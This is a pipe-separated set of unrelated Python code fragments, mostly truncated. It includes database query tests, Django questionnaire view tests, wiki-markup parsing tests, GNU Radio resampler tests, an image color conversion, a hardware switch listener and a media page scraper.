result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_leftcor))
for idx, val in enumerate(expected_leftcor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
order = db.t1.aa | db.t1.bb
db(db.t1.bb.belongs(sub)).update(mark=1)
result = db(db.t1.mark == 1).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(~db.t1.bb.belongs(sub)).delete()
result = db(db.t1.id > 0).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(db.t1.id > 0).delete()
for item in data_t1:
db.t1.insert(**item)
# Uncorrelated subqueries
kwargs = dict(correlated=False)
sub = db(subquery).nested_select(*subfields, **kwargs)
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
# MySQL does not support subqueries with uncorrelated references
# to target table
# Correlation prevented by alias in parent select
tmp = db.t1.with_alias("tmp")
sub = db(subquery).nested_select(*subfields)
query = tmp.bb.belongs(sub)
order = tmp.aa | tmp.bb
result = db(query).select(tmp.aa, tmp.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
order = db.t3.aa | tmp.bb
result = db(db.t3).select(db.t3.aa, tmp.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
left = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, tmp.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
# SQLite does not support aliasing target table in UPDATE/DELETE
# MySQL does not support subqueries with uncorrelated references
# to target table
class TestAddMethod(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
@db.tt.add_method.all
def select_all(table, orderby=None):
return table._db(table).select(orderby=orderby)
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(len(db.tt.all()), 3)
class TestBelongs(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.aa.belongs(("1", "3"))).count(), 2)
self.assertEqual(
db(db.tt.aa.belongs(db(db.tt.id > 2)._select(db.tt.aa))).count(), 1
)
self.assertEqual(
db(
db.tt.aa.belongs(db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa))
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.belongs(
db(
db.tt.aa.belongs(
db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa)
)
)._select(db.tt.aa)
)
).count(),
2,
)
class TestContains(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"), Field("bb", "string"))
self.assertEqual(db.tt.insert(aa=["aaa", "bbb"], bb="aaa"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 2)
self. |
"""Placeholder."""
import numpy as np
def rgb_to_hsi(im):
"""Convert to HSI the RGB pixels in im.
Adapted from
https://en.wikipedia.org/wiki/HSL_and_HSV#Hue_and_chroma.
"""
im = np.moveaxis(im, -1, 0)
if len(im) not in (3, 4):
raise ValueError("Expected 3-channel RGB or 4-channel RGBA image;"
" received a {}-channel image".format(len(im)))
im = im[:3]
hues = (np.arctan2(3**0.5 * (im[1] - im[2]),
2 * im[0] - im[1] - im[2]) / (2 * np.pi)) % 1
intensities = im.mean(0)
saturations = np.where(
intensities, 1 - im.min(0) / np.maximum(intensities, 1e-10), 0)
return np.stack([hues, saturations, intensities], -1)
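# Editor's usage sketch: a random 8x8 RGB image in [0, 1]; the shape is an
# assumption, rgb_to_hsi only needs the channel axis to come last:
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    hsi = rgb_to_hsi(rng.random((8, 8, 3)))
    print(hsi.shape)  # (8, 8, 3): hue, saturation, intensity per pixel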
|
import LNdigitalIO
def switch_pressed(event):
event.chip.output_pins[event.pin_num].turn_on()
def switch_unpressed(event):
event.chip.output_pins[event.pin_num].turn_off()
if __name__ == "__main__":
LNdigital = LNdigitalIO.LNdigitals()
listener = LNdigitalIO.InputEventListener(chip=LNdigital)
for i in range(4):
listener.register(i, LNdigitalIO.IODIR_ON, switch_pressed)
listener.register(i, LNdigitalIO.IODIR_OFF, switch_unpressed)
listener.activate()
|
leFactory
class AssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.region = None
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=self.region)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=self.region)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=self.region)
self.form_data = {'questions': [self.question1.id, self.question2.id]}
self.url = '/subsection/%d/assign_questions/' % self.subsection.id
def test_get_assign_question_page(self):
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
templates = [template.name for template in response.templates]
self.assertIn('questionnaires/assign_questions.html', templates)
def test_gets_assign_questions_form_and_subsection_in_context(self):
afro = Region.objects.create(name="Afro")
question_in_region = Question.objects.create(text='not in Region Q', UID='C000R3', answer_type='Number',
region=afro)
response = self.client.get(self.url)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertNotIn(question_in_region.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_GET_puts_list_of_already_used_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(question1, response.context['active_questions'])
self.assertIn(question1, response.context['questions'])
def test_GET_does_not_put_parent_questions_in_the_context(self):
parent_question = Question.objects.create(text='parent q', UID='C000R3', answer_type='Number')
self.question1.parent = parent_question
self.question1.save()
used_question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region, parent=parent_question)
used_question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(3, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertIn(used_question1.text, questions_texts)
self.assertNotIn(parent_question.text, questions_texts)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(used_question1, response.context['active_questions'])
def test_post_questions_assigns_them_to_subsections_and_get_or_create_group(self):
self.failIf(self.question1.question_group.all())
self.failIf(self.question2.question_group.all())
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
question_group = self.question1.question_group.all()
self.assertEqual(1, question_group.count())
self.assertEqual(question_group[0], self.question2.question_group.all()[0])
self.assertEqual(self.subsection, question_group[0].subsection)
def test_successful_post_redirect_to_referer_url(self):
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
self.assertRedirects(response, self.url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
message = "Questions successfully assigned to questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_with_errors_returns_the_form_with_error(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': []}, **meta)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertIn("This field is required.", response.context['assign_question_form'].errors['questions'])
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN, region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.get(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_GET_with_hide_param_puts_list_of_only_unused_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
hide_url = '/subsection/%d/assign_questions/?hide=1' % self.subsection.id
response = self.client.get(hide_url)
self.assertIn(question1, response.context['active_questions'])
self.assertNotIn(question1, response.context['questions'])
class UnAssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=None)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=None)
self.question |
Invalid 1 == foo
==
Invalid 2 ==
== Invalid 3
==
==
Invalid 4
==
== Invalid 5
foo ==
"""
expected = [
"Section with trailing spaces",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
class test_ensure_flagged:
def test_add(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]{{bar}}"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_strip_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_replace_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "param1", "param2")
assert str(wikicode) == "[[foo]] {{bar|param1|param2}}"
def test_named_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "2=param1", "1=param2")
assert str(wikicode) == "[[foo]] {{bar|2=param1|1=param2}}"
def test_dead_link(self):
wikicode = mwparserfromhell.parse("[[foo]]{{Dead link|2000|01|01}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "Dead link", "2017", "2", "3", overwrite_parameters=False)
assert str(wikicode) == "[[foo]]{{Dead link|2000|01|01}}"
class test_ensure_unflagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{baz}}"
def test_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar (Language)}}"
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]]"
def test_match_only_prefix_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]] {{baz (Language)}}"
class test_is_flagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_true(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is True
def test_false_exact_match(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is True
def test_match_only_prefix_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is False
class test_is_redirect:
redirects = [
# any number of spaces
"#redirect[[foo]]",
"#redirect [[foo]]",
"#redirect [[foo]]",
# optional colon
"#redirect: [[foo]]",
"#redirect :[[foo]]",
"#redirect : [[foo]]",
# any capitalization
"#reDiRect [[foo]]",
"#REDIRECT [[foo]]",
# leading whitespace
"\n \n #redirect [[foo]]",
# any section and alternative text (which is ignored)
"#redirect [[foo#section]]",
"#redirect [[foo#section|ignored]]",
# templates
# FIXME: probably not possible to pair '{{' and '}}' with a regex
# "#redirect [[{{echo|Foo}}bar]]",
]
nonredirects = [
"#redirect [[]]",
"#redirect [[]]",
"#redirect [[<nowikifoo]]",
"#redirect :: [[foo]]",
"#redirect [[foo{}]]",
]
def test_redirects(self):
for text in self.redirects:
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "\n"
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "bar"
assert is_redirect(text, full_match=False)
assert not is_redirect(text, full_match=True)
def test_nonredirects(self):
for text in self.redirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
for text in self.nonredirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
class test_parented_ifilter:
wikicode = mwparserfromhell.parse("""<span>
foo {{bar|some text and {{another|template}}}}
</span>
{{foo|bar}}
""")
def test_recursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=True):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=True)
def test_nonrecursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=False):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=False)
def test_recursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=True):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=True)
def test_nonrecursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=False):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wiki |
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from __future__ import print_function
from __future__ import division
from gnuradio import gr, gr_unittest, filter, blocks
import math
import random
import sys
def random_floats(n):
r = []
for x in range(n):
# r.append(float(random.randint(-32768, 32768)))
r.append(float(random.random()))
return tuple(r)
def reference_dec_filter(src_data, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_filter(src_data, interp, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.interp_fir_filter_fff(interp, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_dec_filter(src_data, interp, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
up = filter.interp_fir_filter_fff(interp, (1,))
dn = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, up, dn, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
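# Editor's note: the three helpers above build the reference flowgraphs that
# rational_resampler_base_fff(interpolation, decimation, taps) is compared
# against in the tests below:
#     interpolate only: interp_fir_filter_fff(interp, taps)
#     decimate only:    fir_filter_fff(decim, taps)
#     both:             interp_fir_filter_fff(interp, (1,)) -> fir_filter_fff(decim, taps)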
class test_rational_resampler (gr_unittest.TestCase):
def setUp(self):
random.seed(0)
def tearDown(self):
pass
def test_000_1_to_1(self):
taps = (-4, 5)
src_data = (234, -4, 23, -56, 45, 98, -23, -7)
xr = (1186, -112, 339, -460, -167, 582)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_001_interp(self):
taps = [1, 10, 100, 1000, 10000]
src_data = (0, 2, 3, 5, 7, 11, 13, 17)
interpolation = 3
xr = (2,20,200,2003,20030,
300,3005,30050,
500,5007,50070,
700,7011,70110,
1100,11013,110130,
1300,13017,130170,
1700.0,17000.0,170000.0, 0.0)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_002_interp(self):
taps = random_floats(31)
src_data = random_floats(10000)
interpolation = 3
expected_result = reference_interp_filter(src_data, interpolation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 1000
offset = len(taps)-1
self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
def xtest_003_interp(self):
taps = random_floats(9)
src_data = random_floats(10000)
decimation = 3
expected_result = reference_dec_filter(src_data, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 10
offset = 10  # len(taps)-1
print(expected_result[100+offset:100+offset+N])
print(result_data[100:100+N])
#self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_004_decim_random_vals(self):
MAX_TAPS = 9
MAX_DECIM = 7
OUTPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for decim in range(1, MAX_DECIM+1):
for ilen in range(ntaps + decim, ntaps + OUTPUT_LEN*decim):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_dec_filter(src_data, decim, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
if False:
sys.stderr.write('delta = %2d: ntaps = %d decim = %d ilen = %d\n' % (L2 - L1, ntaps, decim, ilen))
sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
(len(result_data), len(expected_result)))
self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_005_interp_random_vals(self):
MAX_TAPS = 9
MAX_INTERP = 7
INPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for interp in range(1, MAX_INTERP+1):
for ilen in range(ntaps, ntaps + INPUT_LEN):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_interp_filter(src_data, interp, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
#if True or abs(L1-L2) > 1:
if False:
sys.stderr.write('delta = %2d: ntaps = %d interp = %d ilen = %d\n' % (L2 - L1, ntaps, interp, ilen))
#sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
# (len(result_data), len(expected_result)))
#self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME check first ntaps+1 answers
self.assertEqual(expected_result[ntaps+1:L], result_data[ntaps+1:L])
def test_006_interp_decim(self):
taps = random_floats(31)
src_data = random_floats(10000)
interp = 3
decimation = 2
expected_result = reference_interp_dec_filter |
tmpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
# autoselect
if tmpList and tmpList.skill.find('autoselect') != -1 and len(tmpList.items) == 1:
m = tmpList.items[0]
m_type = m['type']
if m_type == 'rss':
common.log('Autoselect - ' + m['title'])
lItem = m
tmpList = self.parse(lItem).list
if not tmpList:
return ParsingResult(ParsingResult.Code.CFGSYNTAX_INVALID, None)
if tmpList and not successfullyScraped:
return ParsingResult(ParsingResult.Code.WEBREQUEST_FAILED, tmpList)
# Remove duplicates
if tmpList.skill.find('allowDuplicates') == -1:
urls = []
for i in range(len(tmpList.items)-1,-1,-1):
item = tmpList.items[i]
tmpUrl = item['url']
tmpCfg = item['cfg']
if not tmpCfg:
tmpCfg = ''
if (tmpUrl + '|' + tmpCfg) not in urls:
urls.append(tmpUrl + '|' + tmpCfg)
else:
tmpList.items.remove(item)
return ParsingResult(ParsingResult.Code.SUCCESS, tmpList)
"""
loads cfg, creates list and sets up rules for scraping
"""
def __loadLocal(self, filename, lItem = None):
params = []
#get Parameters
if filename.find('@') != -1:
params = filename.split('@')
filename = params.pop(0)
# get cfg file
cfg = filename
if not os.path.exists(cfg):
cfg = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(cfg):
tmpPath = os.path.dirname(os.path.join(common.Paths.modulesDir, lItem["definedIn"]))
cfg = os.path.join(tmpPath ,filename)
if not os.path.exists(cfg):
srchFilename = filename
if filename.find('/') > -1:
    srchFilename = srchFilename.split('/')[1]
try:
cfg = findInSubdirectory(srchFilename, common.Paths.modulesDir)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.favouritesFolder)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.customModulesDir)
except:
common.log('File not found: ' + srchFilename)
return None
#load file and apply parameters
data = getFileContent(cfg)
data = cr.CustomReplacements().replace(os.path.dirname(cfg), data, lItem, params)
#log
msg = 'Local file ' + filename + ' opened'
if len(params) > 0:
msg += ' with Parameter(s): '
msg += ",".join(params)
common.log(msg)
outputList = self.__parseCfg(filename, data, lItem)
return outputList
"""
scrape items according to rules and add them to the list
"""
def __loadRemote(self, inputList, lItem):
try:
inputList.curr_url = lItem['url']
count = 0
i = 1
maxits = 2 # 1 optimistic + 1 demystified
ignoreCache = False
demystify = False
back = ''
startUrl = inputList.curr_url
#print inputList, lItem
while count == 0 and i <= maxits:
if i > 1:
ignoreCache = True
demystify = True
# Trivial: url is from known streamer
if back:
lItem['referer'] = back
items = self.__parseHtml(inputList.curr_url, '"' + inputList.curr_url + '"', inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
# try to find items in html source code
if count == 0:
referer = ''
if lItem['referer']:
referer = lItem['referer']
data = common.getHTML(inputList.curr_url, None, referer, False, False, ignoreCache, demystify)
if data == '':
return False
msg = 'Remote URL ' + inputList.curr_url + ' opened'
if demystify:
msg += ' (demystified)'
common.log(msg)
if inputList.section != '':
section = inputList.section
data = self.__getSection(data, section)
if lItem['section']:
section = lItem['section']
data = self.__getSection(data, section)
items = self.__parseHtml(inputList.curr_url, data, inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
common.log(' -> ' + str(count) + ' item(s) found')
# find rtmp stream
#common.log('Find rtmp stream')
if count == 0:
item = self.__findRTMP(data, startUrl, lItem)
if item:
items = []
items.append(item)
count = 1
# find embedding javascripts
#common.log('Find embedding javascripts')
if count == 0:
item = findJS(data)
if item:
firstJS = item[0]
streamId = firstJS[0]
jsUrl = firstJS[1]
if not jsUrl.startswith('http://'):
jsUrl = urllib.basejoin(startUrl,jsUrl)
streamerName = getHostName(jsUrl)
jsSource = getHTML(jsUrl, None, startUrl, True, False)
phpUrl = findPHP(jsSource, streamId)
if phpUrl:
data = getHTML(phpUrl, None, startUrl, True, True)
item = self.__findRTMP(data, phpUrl, lItem)
if item:
if streamerName:
item['title'] = item['title'].replace('RTMP', streamerName)
items = []
items.append(item)
count = 1
else:
red = phpUrl
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
continue
# find redirects
#common.log('find redirects')
if count == 0:
red = self.__findRedirect(startUrl, inputList.curr_url)
if startUrl == red:
common.log(' -> No redirect found')
else:
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_mapcalc.py
------------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
